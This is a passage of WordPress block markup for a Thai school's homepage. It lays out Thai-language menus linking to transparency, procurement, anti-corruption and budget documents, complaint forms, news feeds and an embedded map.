{\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\" data-type=\"link\" data-id=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container 